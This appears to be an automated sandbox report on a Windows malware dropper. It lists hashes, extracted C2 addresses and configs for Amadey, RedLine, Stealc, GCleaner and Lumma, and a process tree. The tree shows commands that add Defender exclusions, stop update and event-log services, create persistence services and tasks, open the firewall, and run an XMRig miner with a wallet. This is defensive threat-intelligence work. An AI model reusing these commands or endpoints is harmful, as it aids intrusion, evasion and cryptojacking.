Analysis

  • max time kernel
    52s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
  • submitted
    14-05-2024 18:00

General

  • Target

    99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d.exe

  • Size

    1.6MB

  • MD5

    001be162d542c660f606af631a96a943

  • SHA1

    5d9ddc2c639aa967474fff665f786fdd3b53f6eb

  • SHA256

    99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d

  • SHA512

    160285ea718dfec555990bcc43cf4e2dac3cf067cbfb00b4a77c96de5a5977f42965f14a25d6c6f1aadd5187d9e8d3916826a431b098fde61cba4064ac97ddca

  • SSDEEP

    49152:3tlPaig3iDLdwtzVrQO10UNu16fjbC+gCOeC:9lCD3iDRwvrsUNu167WVx

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d
rc4.plain
1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

gcleaner

C2

185.172.128.90

5.42.64.56

5.42.65.64

Extracted

Family

lumma

C2

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 2 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • XMRig Miner payload 2 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, and can be used as a sandboxing environment.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 42 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d.exe
    "C:\Users\Admin\AppData\Local\Temp\99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3272
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:4568
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
        PID:1188
      • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
        "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2884
        • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
          "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2244
          • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
            "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2320
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:812
              • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                7⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:4104
              • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1140
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 332
              6⤵
              • Program crash
              PID:224
          • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              PID:4348
          • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
          • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
            "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:3608
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3468
              • C:\Windows\SysWOW64\sc.exe
                Sc stop GameServerClient
                7⤵
                • Launches sc.exe
                PID:4856
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService remove GameServerClient confirm
                7⤵
                • Executes dropped EXE
                PID:3920
              • C:\Windows\SysWOW64\sc.exe
                Sc delete GameSyncLink
                7⤵
                • Launches sc.exe
                PID:2752
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService remove GameSyncLink confirm
                7⤵
                • Executes dropped EXE
                PID:4640
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                7⤵
                • Executes dropped EXE
                PID:1556
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService start GameSyncLink
                7⤵
                • Executes dropped EXE
                PID:2288
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
              6⤵
              PID:3876
              • C:\Windows\SysWOW64\sc.exe
                Sc stop GameServerClientC
                7⤵
                • Launches sc.exe
                PID:3076
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService remove GameServerClientC confirm
                7⤵
                • Executes dropped EXE
                PID:2296
              • C:\Windows\SysWOW64\sc.exe
                Sc delete PiercingNetLink
                7⤵
                • Launches sc.exe
                PID:1888
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService remove PiercingNetLink confirm
                7⤵
                • Executes dropped EXE
                PID:2388
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                7⤵
                • Executes dropped EXE
                PID:4472
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService start PiercingNetLink
                7⤵
                • Executes dropped EXE
                PID:1660
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
              6⤵
              PID:2832
              • C:\Windows\SysWOW64\sc.exe
                Sc delete GameSyncLinks
                7⤵
                • Launches sc.exe
                PID:2040
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService remove GameSyncLinks confirm
                7⤵
                • Executes dropped EXE
                PID:4732
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                7⤵
                • Executes dropped EXE
                PID:4060
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService start GameSyncLinks
                7⤵
                • Executes dropped EXE
                PID:1756
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
              6⤵
              PID:5296
          • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:5040
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              PID:832
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              PID:1156
          • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
            "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:736
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              PID:2412
          • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
            "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:3964
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
              6⤵
              • Creates scheduled task(s)
              PID:444
            • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
              "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
              6⤵
              • Executes dropped EXE
              PID:832
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 464
                7⤵
                • Program crash
                PID:1224
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 488
                7⤵
                • Program crash
                PID:4724
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 748
                7⤵
                • Program crash
                PID:4576
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 748
                7⤵
                • Program crash
                PID:4316
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 832
                7⤵
                • Program crash
                PID:4636
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 852
                7⤵
                • Program crash
                PID:2860
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 968
                7⤵
                • Program crash
                PID:4060
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 968
                7⤵
                • Program crash
                PID:3876
            • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
              "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
              6⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              PID:1508
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 460
                7⤵
                • Program crash
                PID:740
            • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
              "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
              6⤵
              • Executes dropped EXE
              PID:3484
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3084
              • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                7⤵
                PID:2832
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5664
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  8⤵
                  PID:5600
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    9⤵
                    • Modifies Windows Firewall
                    PID:4280
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5692
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:3996
            • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
              "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
              6⤵
              • Executes dropped EXE
              PID:4236
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:5124
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                7⤵
                PID:1292
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  8⤵
                  PID:5352
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop UsoSvc
                7⤵
                • Launches sc.exe
                PID:1288
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                7⤵
                • Launches sc.exe
                PID:5432
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop wuauserv
                7⤵
                • Launches sc.exe
                PID:5364
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop bits
                7⤵
                • Launches sc.exe
                PID:2500
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop dosvc
                7⤵
                • Launches sc.exe
                PID:5328
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                7⤵
                PID:2700
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                7⤵
                PID:4828
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                7⤵
                PID:3244
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                7⤵
                PID:3140
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe delete "WSNKISKT"
                7⤵
                • Launches sc.exe
                PID:4704
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                7⤵
                • Launches sc.exe
                PID:5316
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop eventlog
                7⤵
                • Launches sc.exe
                PID:4472
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe start "WSNKISKT"
                7⤵
                • Launches sc.exe
                PID:3012
      • C:\Users\Admin\1000006002\4cb49b2ba7.exe
        "C:\Users\Admin\1000006002\4cb49b2ba7.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        PID:4832
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2320 -ip 2320
    1⤵
    PID:868
  • C:\Program Files (x86)\GameSyncLink\GameService.exe
    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
    1⤵
    • Executes dropped EXE
    PID:3080
    • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
      "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
      2⤵
      • Executes dropped EXE
      PID:868
      • C:\Windows\Temp\830970.exe
        "C:\Windows\Temp\830970.exe" --list-devices
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2032
  • C:\Program Files (x86)\GameSyncLink\GameService.exe
    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
    1⤵
    • Executes dropped EXE
    PID:1396
    • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
      "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
      2⤵
      • Executes dropped EXE
      PID:1984
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 832 -ip 832
    1⤵
    PID:4856
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 832 -ip 832
    1⤵
    PID:1756
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1508 -ip 1508
    1⤵
    PID:3304
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 832 -ip 832
    1⤵
    PID:960
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 832 -ip 832
    1⤵
    PID:2376
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 832 -ip 832
    1⤵
    PID:984
  • C:\Program Files (x86)\GameSyncLink\GameService.exe
    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
    1⤵
    • Executes dropped EXE
    PID:320
    • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
      "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
      2⤵
      • Executes dropped EXE
      PID:4468
      • C:\Windows\Temp\850308.exe
        "C:\Windows\Temp\850308.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:2040
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 832 -ip 832
                                                  1⤵
                                                    PID:3876
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 832 -ip 832
                                                    1⤵
                                                      PID:3464
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 832 -ip 832
                                                      1⤵
                                                        PID:4636
                                                      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                        C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                        1⤵
                                                          PID:5372
                                                        • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                          C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                          1⤵
                                                            PID:5380
                                                          • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                            C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                            1⤵
                                                              PID:5612
                                                            • C:\Windows\system32\dwm.exe
                                                              "dwm.exe"
                                                              1⤵
                                                                PID:5788
                                                              • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                1⤵
                                                                  PID:3100
                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                    2⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:2668
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                    2⤵
                                                                      PID:4224
                                                                      • C:\Windows\system32\wusa.exe
                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                        3⤵
                                                                          PID:2356
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:4384
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:6044
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:1068
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop bits
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:3596
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:2232
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        2⤵
                                                                          PID:5216
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                          2⤵
                                                                            PID:2700
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                            2⤵
                                                                              PID:3200
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              2⤵
                                                                                PID:3864
                                                                              • C:\Windows\system32\conhost.exe
                                                                                C:\Windows\system32\conhost.exe
                                                                                2⤵
                                                                                  PID:5224
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                    3⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:1492
                                                                                • C:\Windows\explorer.exe
                                                                                  explorer.exe
                                                                                  2⤵
                                                                                    PID:464
                                                                                • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                  1⤵
                                                                                    PID:3984
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                    1⤵
                                                                                      PID:712

Network

• US
  DNS
  g.bing.com
  Remote address: 8.8.8.8:53
  Request
  g.bing.com IN A
  Response
  g.bing.com IN CNAME g-bing-com.dual-a-0034.a-msedge.net
  g-bing-com.dual-a-0034.a-msedge.net IN CNAME dual-a-0034.a-msedge.net
  dual-a-0034.a-msedge.net IN A 204.79.197.237
  dual-a-0034.a-msedge.net IN A 13.107.21.237
• US
  GET
  https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949
  Remote address: 204.79.197.237:443
  Request
  GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949 HTTP/2.0
  host: g.bing.com
  accept-encoding: gzip, deflate
